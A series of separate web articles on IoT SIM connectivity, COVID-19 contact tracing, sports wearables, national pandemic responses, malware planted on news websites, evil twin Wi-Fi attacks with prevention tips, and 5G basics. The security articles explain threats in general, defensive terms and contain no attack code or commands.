The IoT ecosystem also includes M2M or machine-to-machine connections, which refer to the direct communication between devices using any communications channel, including wired and wireless networks. M2M is not a new concept; it predates cellular communication, and has been utilized in applications such as telemetry, industrial, automation, and Supervisory Control And Data Acquisition (SCADA) scenarios for a very long time.
All these types of connections can be classified into two categories: cellular and non-cellular. Cellular connections includes all wireless networks specified by 3GPP standards—2G, 3G, 4G, 5G, LTE-M and NB-IoT. Non-cellular connectivity includes: Wi-Fi, Bluetooth, Zigbee, SIGFOX or LoRa for example.
Cellular IoT connectivity: a two-sided reality
The cellular IoT market is the most common connectivity service provided by mobile network operators (MNOs), but there are two angles to this.
The first is the connectivity that provides high throughput services such as 2G, 3G, 4G or even 5G. The second is low power connectivity services provided by LTE-M or NB-IoT—which will also be supported by upcoming 5G releases. Low power cellular networks address connected devices that require an improved coverage, low throughput, reactivity of the network, but also low power consumption—for devices running on batteries for example.
All these cellular use cases require a UICC (commonly known as a SIM) in order to be able to authenticate the device to the network.
The IoT and M2M SIM: a ruggedized cousin to the smartphone SIM designed for the IoT ecosystem
SIM technology is used by MNOs to authenticate a device (or user equipment) accessing their network and services. In addition to this core function, SIM technology can support additional security capabilities like IoT SAFE that can be used by IoT service providers and Original Equipment Manufacturers (OEMs) in coordination with their MNO partners to enhance the security of IoT services.
It’s important to note that a SIM used in a smartphone is not the same type of SIM used for the IoT ecosystem. An IoT SIM is a cousin to the smartphone SIM, designed specifically for connected devices that require robust features, which can withstand extreme environmental conditions, connect on cellular low power networks, and helps to extend the battery life of connected objects such as smart meters. This type of connected device is a long-lasting product that can be on the field for several years, sometimes more than 10 years.
eUICC for IoT: connecting IoT devices with eSIM technology
Connected devices, can also benefit from an embedded UICC (eUICC) technology—already in use today—which is a reprogrammable SIM where the credentials of the mobile network operator can be loaded remotely to change the subscription from operator A to operator B. This type of SIM technology is usually embedded or soldered into a device during manufacturing. An eUICC (or eSIM) can remotely manage multiple mobile network operator subscriptions with GSMA’s Remote SIM Provisioning.
iSIM: an evolution of SIM technology for the IoT ecosystem
As the IoT ecosystem continues growing, the evolution of SIM options will also continue expanding in order to adapt and meet new demands. A great example of this is integrated SIM (iSIM) or integrated eUICC (ieUICC). Instead of a standard SIM or eUICC that can be plugged or soldered, the iSIM goes a stage further by being integrated into the silicon design of a system on a chip (SoC)*. In terms of the functionalities it can be similar to a standalone SIM (with only one permanent subscription) or it can be more flexible like the eUICC (where the needed profiles can be uploaded over-the-air along the device life cycle).
The broader picture of IoT connectivity and security
There are many IoT industry verticals, big and small and the needs of each project deployment isn’t necessarily the same. Each use case is unique and has its specific needs and requirements, and although a specific type of SIM in general is an integral part of connecting IoT devices, it is only just a piece.
Connected objects also have to be managed and secured. They require updates and monitoring. It’s important to fully understand your IoT deployment needs, which include not just the right SIM, but overall end-to-end solutions. | <urn:uuid:6deecf25-c91d-49f6-8fc1-0d7642c28d0c> | CC-MAIN-2022-40 | https://ideas.idemia.com/understanding-the-connectivity-of-the-iot-ecosystem | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334974.57/warc/CC-MAIN-20220927002241-20220927032241-00001.warc.gz | en | 0.928731 | 1,056 | 3.0625 | 3 |
By CHHS Extern Carly Yost
Public health jargon, previously only known by professionals in the field, is now a part of most people’s everyday vernacular. Due to the global pandemic caused by the emergence of COVID-19, contact tracing is among those previously unknown terms that are now a part of everyone’s daily lives. Several large cities across the United States have recently hired hundreds to thousands of new contact tracers in hopes to contain the spread of COVID-19 as restrictions on Stay-At-Home orders are lifted. At the same, Google and Apple released software that would allow cities to create contact tracing apps which residents would download on their phones. While the concept of contact tracing may be now well-known, the application is still lackluster. The responsibility of contact tracing for public health ultimately falls on local government, but both individuals and companies can play their own role in contact tracing and help fill the gaps where local jurisdictions are struggling.
In the past few months, many local health departments have gone from employing a handful of contact tracers to hundreds and thousands. During this pandemic, contact tracers reach out to everyone who tests positive for COVID-19 and find out contact information for anyone who they have come in contact with in the past 14 days. However, in New York City, of those who tested positive, less than 50% gave contact information for those these came into contact with in the 14 days before the positive test. Privacy concerns seem to be the United States’ general deficiency in contact tracing in comparison to other countries. For example, other countries have required people to write down their contact information when entering businesses or large gatherings, in order to have a reliable method to trace contact even with people unknown to the person who tested positive for COVID-19. Without these kinds of regulations in the United States, it will remain a difficult task for contact tracers to find any strangers an infectious person may have come into contact with.
Although cites in the U.S. have not implemented similar methods, some have encouraged individuals to keep their own log. Upon a new phase of reopening for the city, Baltimore City Health Commissioner, Dr. Letitia Dzirasa, advised individuals to “[keep] physical or digital note of places they visit and instances and times in which they were in close contact with others for a prolonged period of time. This means places where you’ve been closer than 6 feet to others for longer than 15 minutes.” This individual contact log will make the work of the 300 new contact tracers hired by Baltimore City much more timely and effective. While the CDC website does not contain any specific guidelines for individuals tracing their own contacts, it does state that contact tracing is the key to slowing the spread of COVID-19. According to the CDC, a contact tracer will ask everyone to list names of those for whom they have been within six feet for over 15 minutes during the time they may have been infectious, and it seems keeping a personal log can only help during this process.
Not only local governments and individuals, but also companies have a newfound interest in contact tracing as they hope to bring their workforce back into full operation. The basics being recommended by most health departments for businesses are temperature and health screenings, but businesses are certainly going beyond those measures to track employees’ movement once inside the building, through cell phone apps, VPN tracking on work-issued laptops, badges, or even light sensors. This of course brings up privacy concerns with an intersection of employment law, health law, and privacy law, with experts advising the best course of actions would be a vetted cell phone contact tracing app. With effective contact tracing, offices can be more assured that once they reopen, they will remain open and if one person gets sick, there is a lower probability that an outbreak occurs across the entire office.
Contact tracing may seem as though it is just a new buzzword, but the CDC, health departments, and other experts continue echoing its utmost importance during the COVID-19 pandemic. Now is the time when individuals should consider what part they can play in contact tracing, to assist with the local resources already in place. Maintaining a log of people you come into contact with for will aid contact tracers if you do test positive for the virus. Continuously following CDC guidelines will slow the spread of COVID-19, thereby making contact tracing more manageable. Additionally, as businesses begin to reopen, research and precautions should be taken to limit the spread of COVID which means effectively tracing contact while not violating privacy laws. Better Business Bureau Northwest and Pacific gave precautionary tips to employers hoping to utilize contact tracing, particularly to pay attention to how and where data is stored, who has access to collected data, and how much information is shared with employees. The resounding advice for employers shopping for contact tracing applications is to find one which does not permit the employer to access the data and keeps the data anonymous and preferably stored on the user’s device. The key is protect the individual’s right to privacy, especially concerning health data, while mitigating a “direct threat” to the health and safety of everyone in the workplace. As public health experts have long-known, contact tracing is now a societal responsibility and an operational necessity. | <urn:uuid:a42f7a40-0991-4f86-bb8c-06b0f0b25710> | CC-MAIN-2022-40 | https://www.mdchhs.com/2020/07/13/unpacking-contact-tracing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334974.57/warc/CC-MAIN-20220927002241-20220927032241-00001.warc.gz | en | 0.962149 | 1,081 | 2.984375 | 3 |
The Competition is Fierce in the World of Sports and Wearable Devices.
Wearable technology in sports is now commonplace as multiple teams and coaches look for ways to gain an advantage over their competitors. These wearable devices also allow non-professional athletes to track, monitor and improve their performance and well-being. Across all levels and types of sport, wearable device technology has a prominent presence, and it’s growing.
Sports teams are getting smarter. Their coaches and players have embraced wearable technologies to help them track and improve performance. Team coaches use the data from these devices to train athletes and to make tactical decisions. No longer do they have to rely on their gut instinct to coach a player. They now have hard data at their fingertips to improve their decision making. Wearable technology is now heavily ingrained into professional sports throughout the world.
As a result, the sports and fitness clothing market have quickly emerged as key industries “jump into the game” of wearable technology. Mind Commerce a research and strategic analysis organization for the Information and Communications Technology (ICT) industry, predicts that wearable technologies in sports and fitness will reach $9.4 billion globally by 2020.
Technology has changed both professional and amateur sports. Participants and coaches alike can make calculated decisions from metrics that can be taken into account and utilized. Although mainly used for performance monitoring, this wearable device technology is also being used to mitigate the risk of injury and player safety.
American Football: Today, improving speed and running ability requires careful analysis of technique, and the Sensoria Fitness Sock is designed to do just that. It’s sensor-filled sock, attachable anklet, and a smartphone app helps athletes and their coaches monitor running techniques. The sock contains e-textile sensors that measure speed, count steps and track calories, altitude, and distance. It also does something no other type of smart footwear does–track cadence, foot-landing technique and weight distribution on the foot. The electronic anklet snaps onto the sock and communicates real-time data to external devices like smartphones. And now, the NFL is now able to not only track their players’ performance via wearable devices but broadcast these stats to their TV viewers if they wish.
Baseball: Similarly, Major League Baseball has incorporated technology and data-based companies to help improve performance aspects for their players. The Whoop Strap 2.0 was approved by the league in 2017. The WHOOP device is designed to be worn day and night. It can be worn on various parts of the body, and it measures sleep, recovery, and strain. Before this approval, players could use these devices at any other time, but not during games. The sport’s playing rules committee recently approved two additional devices for use during games: The Motus Baseball Sleeve that measures stress on elbows and the Zephyr Bioharness that monitors heart and breathing rates.
Track and Cycling: Running and jogging are the most common form of cardiovascular fitness in the US today. However, a whopping 70% of runners, unfortunately, suffer from foot-related injuries. The team from Sensoria Fitness Sock hopes to help. Just like they do for football players the smart sock provides feedback that the runner needs. This comes in the form of audio when they’re running. It acts like a coach who analyses the way they take each step. If they exhibit heel striking or unequal weight distribution that can cause injuries, the runner is alerted. This way he or she can make corrections right away. Both professional and every-day runners and cyclists can benefit from this technology. Radar Pace, a joint effort between Oakley and Intel, developed glasses with earbuds attached to the temples that connect the athlete to their coach who advises them in real time about stride length and pace (for runners) or cadence and power output (for cyclists). And the Under Armor SpeedForm Gemini 2 Record Equipped shoe brings in the new era of the smart shoe with smaller sensors and batteries. Lumo Run gives all these a “run for their money” with their Running Coach that also provides audio feedback to help runners stay “on track.”
Basketball: At present, the National Basketball Association doesn’t allow the use of wearable technology during official games. However, when training, professional basketball teams are using them to track workloads and movement to prevent injuries. The Golden State Warriors’ record this last year serves as proof of the value that exists in data from wearable devices. They’ve gained a reputation for experimenting with wearable devices like the Catapult Sports and OmegaWave to assess a player’s functional readiness. Perhaps this is why the franchise has become one of the best teams in the league?
Winter Sports: Snowcookie is popular with skiers and was one of the finalists of the Make it Wearable Challenge by Intel. It’s a project from a Polish team to help improve skiing skills that utilize an Intel Edison to compile and process the massive data that skiers generate. Snowcookie connects skiers to a network of distributed devices that can improve skiing performance. The result is a better, safer, and more connected skier.
Water Sports: For all you “water babies,” Wearable Tech has rated the best fitness trackers for water sports. Some of them include the Nokia Steel HR, the TomTom Spark 3, Garmin Vivoactive 3, Fitbit Ionic, Fitbit Flex 2, Moov Now, Samsung Gear Fit2 Pro, Misfit Shine, and Apple Watch Series 3. They also rated these devices based on how much pressure they can withstand (not how deep they can go).
Wearable devices have demonstrated great success for any athlete who needs feedback on performance. They also hold great promise in minimizing sports-related injuries and helping to provide not only training but recovery platforms. The number of professional and consumer fitness devices that are available is growing every day. Today there are more than 300 wearable fitness devices on the market. Not only is the competition fierce when it comes to sports, but it’s also growing more so amongst the companies that market and sell these devices. This is good news for all of us. Having more choices is always a good thing! | <urn:uuid:1e205282-caab-4184-9eff-b9a69dbf05e6> | CC-MAIN-2022-40 | https://www.ecwcomputers.com/get-into-the-game/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335190.45/warc/CC-MAIN-20220928082743-20220928112743-00001.warc.gz | en | 0.961188 | 1,273 | 2.515625 | 3 |
Impact Of Pandemic On Different Countries
The unforeseen challenges caused by Covid-19 have not left any country in the world unaffected. There are a total of 203 countries and territories affected by the virus, not just from its spread but also economically. At a global level, the pandemic has bought the economy to an abrupt halt, disrupting the global supply chain and international trade. According to the United Nations, the global economy could shrink up to 1per cent in 2020 due to the pandemic. A warning has been given that it can contract further if restrictions on economic activities are extended without adequate fiscal responses.
Respective governments have taken different measures to control the outbreak and reduce its economic impact on their countries. While many countries are still struggling to contain the virus despite having enacted strict rules, other countries have successfully flattened the transmission curve and are on their way to economic recovery. So what did these countries do differently?
Sharing examples of a few such countries that have been successful in fighting Covid-19:
- New Zealand – On 8th June, the country declared that there were no active Corona cases in the country. Statistics suggest, New Zealand had 1500 infected people, and out of which 22 died. New Zealand is now Corona free. This could only happen because of the imposition of one of the strictest lockdowns in the world, which was swift, its rules were communicated effectively, and intensive testing was done. As a result, curbs on public events, weddings, functions etc. are being gradually lifted. Shopping malls, markets, hotels, restaurants, and public transport are fully functioning, and the economy is already on its path to recovery. The government also announced a fiscal stimulus worth more than 20% of gross domestic product, predicting this sum will jump-start growth and get the jobless rate back to its pre-virus level of 4.2% within two years. The government and the central bank are forecasting a rapid recovery, with annualized growth resuming in mid-2021
- South Korea experienced one of the world's most significant initial outbreaks of Covid-19 but successfully brought down the rate of COVID-19 transmission without even imposing a nationwide lockdown. With wide-scale testing and contact tracing, the country has been able to tackle the virus effectively. It used credit cards, phone data of infected people, to identify their movements and duly informed citizens to avoid taking routes infected people had taken. Monitoring isolations via a web application etc. With the elimination of almost 90% of cases in South Korea, the country eased its social distancing norms and started to open schools, colleges and universities. Businesses also gradually started reopening, bringing the economy back to normal. The crisis has seen South Korean exports plunge steeply. Still, as per the latest preliminary first-quarter numbers reported by The Bank of Korea, South Korea’s GDP grew 1.3% year-on-year indicating the country’s efforts to boost its economy have been successful.
- Japan came from near disaster to become a success story. This only happened because of its widely praised regime of testing, tracing and treating, which made the curve flat quickly. The government on 25th May lifted the state of emergency declared due to COVID-19 because the number of new infections decreased to mere dozens per day. Parts of Japan have exited lockdown. Still, the country's major urban areas remain under lockdown because they are densely populated and reliant on public transportation whose use can lead to a surge in cases. Japan’s economy is at the cusp of recession after two consecutive quarters of negative economic growth. Still, it is expected to rebound by the 3rd quarter.
- Australia’s response to the COVID-19 has been hugely successful compared to the rest of the world. The country closed its borders to all foreign visitors promptly. The government announced on 22nd March that all bars, cinemas, gyms clubs and places of worship would remain close till further notice, while cafes and restaurants would be restricted to take-away only and supermarkets, clothing shops, chemists and beauty salons would remain open. While these restrictions and social distancing rules were put in place in every country, Australia expanded its widespread testing. The country’s success in curbing Covid-19 infections is allowing it to ease some restrictions even as it remains mostly closed off from the rest of the world. Agriculture and mining continue to support exports, and the government is looking at ways to revive the country's manufacturing sector. As per OECD’s latest forecast, Australia is leading the developed world out of the pandemic infused recession, by providing a continuous stimulus that boosts incomes and reduces unemployment.
Proper planning, readiness, and timely and aggressive implementation of measures by governments were the key to controlling the spread of the virus in these countries. As a result, these nations and are now focussed on rebuilding their economies.
On the other hand, the global death toll has crossed the four lakh-mark. As of 7th June, many countries remain unable to control the spread of the virus due to delays in imposing restrictions, large populations, stipulating too few restrictions, slow scale testing, less stringent lockdown rules, ineffective government planning etc. Some examples of these nations are shared below:
- United States- Having watched Asian and European countries struggle against Covid-19, the US was slow to ramp up testing and order its residents to stay at home. Also, as power is not centralized in the US, a national lockdown was not easy to implement. Having downplayed the threat of the virus at its initial stage, today, the US has the highest number of Covid-19 cases in the world. The US economy had already entered a recession in February, well before the pandemic had any effect. Now the US economy is in worse shape with retail sales dropping by 8.7% and over 22 million employees, more than ever in the country’s history, filing for jobless benefits.
- Brazil- The Brazilian government’s chaotic response to the virus has put the country in a difficult spot. With the country recording more than 8 lakh positive cases, it is becoming difficult day by day for Brazil to distribute test kits because of the large size of the country. Health administration and infrastructure are also not very robust in the country. A failure to act early and aggressively, ongoing political turmoil, along with abysmal enforcement of restriction measures have contributed significantly to making Brazil an emerging centre of the pandemic. Because of these factors, Latin America’s largest economy is plunging into its steepest recession in history. The economic fallout has impacted consumer goods and service industries. The consumption of products and services has dropped drastically in Brazil.
- Russia- The Russian government made early efforts to stem the outbreak by shutting the country’s borders and assigning a special task force to combat the pandemic. But recently, it saw a spike in cases, with hospitals overflowing and doctors complaining about lack of protective gear. This can be primarily attributed to mismanagement and improper communication about the number of citizens affected by the virus. As a result, this year, the hotel and public catering industries are suffering their most significant decline in value. Also, the clothing, leather, and footwear manufacturing sectors are expected to shrink at a colossal rate.
- Spain- The main reason for the quick spread of the pandemic in Spain is very mundane. In late February and early March, with temperatures above 20C, the cafes and bars were filled to the brim with happy people, doing what they like best – being sociable. The government’s decision to impose lockdowns came very late. On 8th March, just a week before the country was locked down, sports events, political parties, conferences and massive demonstrations to mark International Women’s Day took place. Thousands of fans few down together for Champions Leagues Matches just before the lockdown was imposed. The country lacked essential equipment like ventilators and protective gear for doctors. In Spain, Coronavirus testing equipment is still being sourced from other countries. Sectors like travel, tourism, aviation, hospitality are in a vulnerable position and direly need urgent relief. Restaurants, sporting events, and many other services have been considerably disrupted.
These examples indicate that the countries, which understood the gravity of the situation and took proactive measures, have been successful in reducing if not halting the spread of the virus. It was preparedness and the timely realization that the virus posed a severe threat which let these countries beat the virus and gave them the additional time and resources to create economic stability. Adequate testing, tracing, robust health care supported by appropriate economic guidance by governments have been vital to these countries sailing through COVID-19. Whereas countries, which made light of the virus, and let it spread before pressing into action, are not only beaten by the virus but also have economies that are bleeding. In these countries, even though the virus is not under control, governments have no choice but to end restrictions to revive the economy. | <urn:uuid:b225873d-72b7-4c8c-a3e0-6fb4324f35d2> | CC-MAIN-2022-40 | https://disaster-recovery-backup.ciotechoutlook.com/cxoinsight/impact-of-pandemic-on-different-countries-nid-5703-cid-112.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337531.3/warc/CC-MAIN-20221005011205-20221005041205-00001.warc.gz | en | 0.970411 | 1,845 | 3.25 | 3 |
One of the common misconceptions regarding safe Web browsing habits is that as long as users stick to established sites, they will not run afoul of malware or hackers. Although avoiding questionable links is always a good practice, it will not always protect individuals from malicious content. For a variety of reasons, members of the international hacking community are constantly attempting to compromise popular websites. The culprits may simply be looking to show off to their peers by orchestrating a high profile breach, but it is just as likely that they are attempting to spread their malware through a conduit that receives tens of thousands of page views each day. To prevent these insidious programs from infecting and corrupting a system, users should maintain robust perimeter defenses such as application control programs along with a system restore and recovery solution in the event that a malicious program becomes pervasive.
According to multiple sources, several high-traffic sites reported experiencing cyberattacks in what appears to be a widespread hacking campaign directed at conservative media outlets. Among those affected by the wave of activity include the Washington Free Beacon, National Journal and the Drudge Report. Cybersecurity researchers identified malicious code embedded in the content of two articles appearing on the Free Beacon’s website. When viewers accessed the compromised articles, they were redirected to executable malware.
Because these articles were hosted by a number of other news outlets, the malware was able to extend its reach. The Drudge Report alone received nearly 2 million unique visitors on the day of the attack, in addition to more than 200,000 mobile-browsing readers. Once deployed, the malware strain creates a backdoor for hackers to steal information, monitor user activity and ensnare machines into their botnet environments.
A display of sophisticated cybercrime
The tactics used by the culprits have demonstrated similarities to waterhole attacks that have become popular with cybercriminals in recent years. These assaults reflect a deepening sophistication of hacker activity as they carry out widespread campaigns while focusing on a narrow range of victims. For example, if a cybercrime syndicate wanted to infiltrate a particular company but didn’t want to risk taking its network defenses head on, it could instead compromise a site frequently used by the company’s employees to spread malware and bypass defenses. In this instance, it seems that the responsible hackers have targeted conservative-minded outlets and individuals.
Protecting networked workstations
Cybersecurity incidents such as this one are of particular concern to organizations that operate publicly accessible computer labs. Users routinely use these machines to access high-traffic websites that can become compromised by malware. To prevent these threats from infecting an entire array of workstations, administrators should deploy system restore and recovery tools to return their computers to their original settings. More sophisticated varieties of this technology allow operators to establish customized configurations that can be restored at anytime. For instance, administrators could organize their computer lab network so that workstations were returned to predetermined settings after each session. This way, whatever malicious content an individual may engage while using a machine will be automatically removed from the system once the session has concluded. | <urn:uuid:05c66de5-8d40-425e-a228-dd27b82c2e44> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/hackers-compromise-popular-media-outlets | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338244.64/warc/CC-MAIN-20221007175237-20221007205237-00001.warc.gz | en | 0.954452 | 719 | 2.71875 | 3 |
Evil twin attacks and how to prevent them
It's natural to use public Wi-Fi to check messages or browse online when you're out and about – shopping, traveling, or simply grabbing a coffee. But using public Wi-Fi can carry risks, one of which is evil twin hacking. Read on to learn about evil twin attacks and how to avoid them.
What is an evil twin attack?
An evil twin attack takes place when an attacker sets up a fake Wi-Fi access point hoping that users will connect to it instead of a legitimate one. When users connect to this access point, all the data they share with the network passes through a server controlled by the attacker. An attacker can create an evil twin with a smartphone or other internet-capable device and some readily available software. Evil twin attacks are more common on public Wi-Fi networks which are unsecured and leave your personal data vulnerable.
How do evil twin attacks work?
Here’s how a typical evil twin Wi-Fi attack works:
Step 1: Looking for the right location
Hackers typically look for busy locations with free, popular Wi-Fi. This includes spaces like coffee shops, libraries, or airports, which often have multiple access points with the same name. This makes it easy for the hacker’s fake network to go undetected.
Step 2: Setting up a Wi-Fi access point
The hacker then takes note of the legitimate network's Service Set Identifier (SSID) and sets up a new account with the same SSID. They can use almost any device to do this, including smartphones, laptops, tablets, or portable routers. They may use a device called a Wi-Fi Pineapple to achieve a broader range. Connected devices can’t distinguish between genuine connections and fake versions.
Step 3: Encouraging victims to connect to the evil twin Wi-Fi
The hacker may move closer to their victims to create a stronger connection signal than the legitimate versions. This convinces people to select their network over the weaker ones and forces some devices to connect automatically.
Step 4: Setting up a fake captive portal
Before you can sign in to many public Wi-Fi accounts, you must submit data on a generic login page. Evil twin hackers set up a copy of this page, hoping to trick unsuspecting victims into disclosing their login credentials. Once the hackers have those, they can log in to the network and control it.
Step 5: Stealing victims’ data
Anyone who logs in connects via the hacker. This is a classic man-in-the-middle attack that allows the attacker to monitor the victim's online activity, whether scrolling through social media or accessing their bank accounts. Suppose a user logs in to any of their accounts. In that case, the hacker can steal their login credentials – which is especially dangerous if the victim uses the same credentials for multiple accounts.
Why are evil twin attacks so dangerous?
Evil twin attacks are dangerous because, when successful, they allow hackers to access your device. This means they can potentially steal login credentials and other private information, including financial data (if the user carries out financial transactions when connected to the evil twin Wi-Fi). In addition, the hackers could also insert malware into your device.
Evil twin Wi-Fi attacks often don't leave tell-tale signs which could expose their true nature. They perform their primary task of providing access to the internet, and many victims won't question it. Users may only realize they've been victimized by an evil twin attack afterward when they notice unauthorized actions performed on their behalf.
Evil twin attack example
A person decides to visit their local coffee shop. Once they are seated with their coffee, they connect to the public Wi-Fi network. They have connected to this access point before without problem, so they have no reason to be suspicious. However, on this occasion, a hacker has set up an evil twin network with an identical SSID name. Because they are seated close to the unsuspecting target, their fake network has a stronger signal than the coffee shop’s real network. As a result, the target connects to it even though it’s listed as ‘Unsecure’.
Once online, the target logs into their bank account to transfer some money to a friend. Because they are not using a VPN or Virtual Private Network, which would encrypt their data, the evil twin network allows hackers to access their banking information. The victim only becomes aware of this later when they realize unauthorized transactions have taken place in their account, causing them financial loss.
Rogue access point vs evil twin – what's the difference?
So, what’s the difference between a rogue access point and an evil twin access point?
- A rogue access point is an illegitimate access point plugged into a network to create a bypass from outside into the legitimate network.
- By contrast, an evil twin is a copy of a legitimate access point. Its objective is slightly different: it tries to lure unsuspecting victims into connecting to the fake network to steal information.
While they are not the same, an evil twin could be considered a form of rogue access point.
What to do if you fall victim to an evil twin attack
If your data is breached through an evil twin Wi-Fi attack, or you suffer financial loss because a hacker stole money or accessed your banking information during the attack, then contact your bank or credit card company immediately. You should also change your passwords across the board (you can read tips on choosing a strong password here). Depending on the severity of the attack, you could contact your local police department too, as well as file a complaint with the relevant consumer protection body in your country.
How to protect your device from evil twins
To avoid falling victim to a fake hotspot or evil twin hacking, here are some precautions you can take:
Avoid unsecured Wi-Fi hotspots:
If you have to connect to a public network, avoid access points marked as ‘Unsecure’. Unsecured networks don't have security features, and evil twin networks nearly always have this designation. Hackers often rely on people not knowing the risks and connecting to their network anyway.
Use your own hotspot:
Using your own personal hotspot instead of public Wi-Fi will protect you from evil twin attacks. This is because you’ll be connected to a reliable network when you’re out and about, which reduces the risk of hackers accessing your data. Set a password to keep your access point private.
Check warning notifications:
If you try connecting to a network and your device alerts you to something suspicious, take notice. Not all users do, which can have negative consequences. Instead of dismissing those seemingly annoying warnings, pay attention because your device is trying to protect you from danger.
If you have auto-connect enabled on your device, it will automatically connect to any networks that you have used before once you're in range. This can be dangerous in public places, especially if you have unknowingly connected to an evil twin network in the past. Instead, disable the auto-connect feature whenever you’re out of the home or office and let your device ask for permission first before connecting. That way, you can check the network and approve or disapprove.
Avoid logging into private accounts on public Wi-Fi:
Where possible, avoid carrying out financial or personal transactions on public Wi-Fi. Hackers can only access your login information if you use it while connected to their evil twin network, so remaining signed out can help protect your private information.
Use multi-factor authentication:
Multi-factor authentication is when two or more steps are required to log into a system. You may combine a password requirement with a code sent to your mobile phone that you need to enter to proceed. This provides an added layer of security between hackers and your information. Where accounts offer multi-factor authentication, it's worth setting it up.
Stick to HTTPS websites:
When using a public network, make sure you only visit HTTPS websites, as opposed to HTTP. (The ‘s’ stands for secure.) An HTTPS website will have end-to-end encryption, which prevents hackers from seeing what you are doing.
Use a VPN:
A VPN or Virtual Private Network protects you from evil twin attacks by encrypting your data on the internet no matter the network you are using. A reliable VPN such as Kaspersky Secure Connection encrypts or scrambles your online activity before sending it to the network, making it impossible for a hacker to read or understand.
You can also make sure to have a comprehensive security product installed. Kaspersky Internet Security protects your device from a wide range of cyberthreats.
Kaspersky Internet Security received two AV-TEST awards for the best performance & protection for an internet security product in 2021. In all tests Kaspersky Internet Security showed outstanding performance and protection against cyberthreats. | <urn:uuid:4f311361-7c0e-497f-ae88-a56a6433dead> | CC-MAIN-2022-40 | https://www.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00201.warc.gz | en | 0.925219 | 1,846 | 2.640625 | 3 |
This week we learned about German bacteriologists who picked a powerful new antibiotic made by a microbe that lives in people’s noses, a leaf-like solar cell that turns CO2 into usable fuel and an arctic heatwave that released anthrax spores from decades-old frozen reindeer.
Proceed with caution.
Scientists at the University of Tubingen in Germany found a new potent antibiotic compound made from bacteria found in people’s noses. The bacterium, Staphylococcus lugdunensis, produces a compound—called lugdunin—that prevents the growth of a different and potentially dangerous kind of staph, S. auerus. A runaway S. aureus can mutate into the dreaded, drug-resistant form known as MRSA, which kills thousands of people every year in the U.S. alone.
“We’ve found a new concept of finding antibiotics,” the journal Science quoted Tubingen bacteriologist Andreas Peschel. “We have preliminary evidence at least in the nose that there is a rich source of many others, and I’m sure that we will find new drugs there.”
Engineers at the University of Illinois at Chicago have come up with a “potentially game-changing” solar cell that traps carbon dioxide and uses sunlight to convert it into a synthetic gas that can be used as fuel.
“Unlike conventional solar cells, which convert sunlight into electricity that must be stored in heavy batteries, the new device essentially does the work of plants, converting atmospheric carbon dioxide into fuel, solving two crucial problems at once,” the team wrote in a news release. “A solar farm of such ‘artificial leaves’ could remove significant amounts of carbon from the atmosphere and produce energy-dense fuel efficiently.”
Scientists at Columbia University have developed a flexible sheet camera that adapts its optics when it is wrapped around objects and keeps gathering high-quality images. Shree Nayar, the Columbia professor of computer science who designed the device, built the camera with his colleague from an elastic array of adaptive lenses “that enables the focal length of each lens in the sheet camera to vary with the local curvature.”
Said Nayar: “Cameras today capture the world from essentially a single point in space. We believe there are numerous applications for cameras that are large in format but very thin and highly flexible.”
Researchers have been playing with superatoms—clusters of atoms that have the ability to emulate the properties of different elements. They’ve already made a cluster of aluminum atoms behave like the chemical element germanium. Now a team from Columbia University led by Xavier Roy built the first molecule made from superatoms. The breakthrough could lead to faster computers, better sensors and denser computer memory.
“These superatom molecules have a rich electrochemical profile and chart a path to a whole family of superatom molecules with new and unusual properties,” Roy and his team wrote in the journal Nano Letters. “We’re aiming to make things where the whole is greater than the sum of the parts,” Roy told New Scientist.
An arctic heat wave sounds like an oxymoron but that’s what’s happening in western Siberia this summer. With temperatures as high 95 degrees Fahrenheit (35 Celsius), the thawing tundra has apparently released anthrax spores that have spent 75 years hibernating inside a reindeer carcass. For the first time since the 1940s, anthrax has sickened people and killed reindeer in the area.
The Washington Post quoted a 2011 paper by a pair of Russian scientists who warned that “as a consequence of permafrost melting, the vectors of deadly infections of the 18th and 19th centuries may come back, especially near the cemeteries where the victims of these infections were buried.” | <urn:uuid:5fa0f28a-a791-4b61-942e-badaa7866892> | CC-MAIN-2022-40 | https://www.mbtmag.com/global/blog/13110299/5-coolest-things-on-earth-this-week | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00201.warc.gz | en | 0.94264 | 815 | 3.53125 | 4 |
What is 5G?
5G stands for “fifth generation.” Same goes for 4G, 3G, all the way down to 1G. Most of us are used to 3G and 4G networks, because they were the last major upgrade to our mobile communication. So, what makes each generation different from one another, and what makes 5G so special?
5G has the ability to make great changes to speed because of the size of the waves it uses to send frequencies. The shorter the frequency, the larger the bandwidth (range of speed). Think about it like your commute to work. Depending on how much traffic there is on the road, the speed you can drive will be affected.
In some places, the 5G express lanes are available with 10x to 100x the speeds you’re used to, but in places they’re not, you’ll be relying on 3G and 4G networks to get you where you’re going. And much like building a highway, though it won’t take as long, rolling out 5G will take some time. If you have a 5G phone already, this is why you may not have 5G service everywhere, like you may have expected.
Internet of Things (IoT) and Low Latency
With the use of 5Gs shorter wavelengths, the possibilities of self-driving cars are in focus again. I know we’ve all probably heard of the self-driving cars that keep getting into accidents, right? Short wavelengths allow the delay between sending and receiving information to drop down to 1 millisecond.
For example, it’s like sending a text to your mom and latency is how long the text takes to reach her phone (not just how long she replies).
Low latency provides the capacity for self-driving cars to have incredible reaction times, which would have prevented accidents we’ve heard of before. 5G also allows more devices to be connected to the same network without fighting with each other over bandwidth. Do you ever have issues with long loading times while watching your show or playing video games when everyone is at home and trying to use the internet as well? 5G would solve this problem and more.
When Will 5G Be Here?
Providers are rolling out 5G on a city-by-city basis. 5G phones are already being offered, but because of the limited amount of 5G networks available, most of these new phones are still relying heavily on 4G networks. In my opinion, it’s best to wait until 5G coverage really is available nationwide. We can expect to experience most, if not all, the benefits of 5G by 2021 or 2022.
- No 5G Does Not Cause Coronavirus
- AT&T’s low-band 5G network is now available nationwide
